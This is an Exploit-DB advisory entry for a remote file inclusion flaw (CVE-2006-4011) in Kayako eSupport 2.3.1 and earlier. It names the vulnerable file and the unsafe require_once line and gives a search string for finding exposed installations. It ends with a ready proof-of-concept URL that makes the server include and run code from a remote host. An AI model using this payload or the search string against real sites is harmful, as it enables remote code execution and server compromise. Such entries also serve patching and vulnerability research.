Kayako eSupport <= 2.3.1 subd Remote File Inclusion Vulnerability

ID EDB-ID:2115
Type exploitdb
Reporter beford
Modified 2006-08-02T00:00:00


Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability. CVE-2006-4011. Webapps exploit for php platform

                                            Script: Kayako eSupport &lt;= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford &lt;xbefordx gmail com&gt;
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

require_once $subd . "functions.php";

Not-leet-enough: "Powered By Kayako eSupport"

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?

# milw0rm.com [2006-08-02]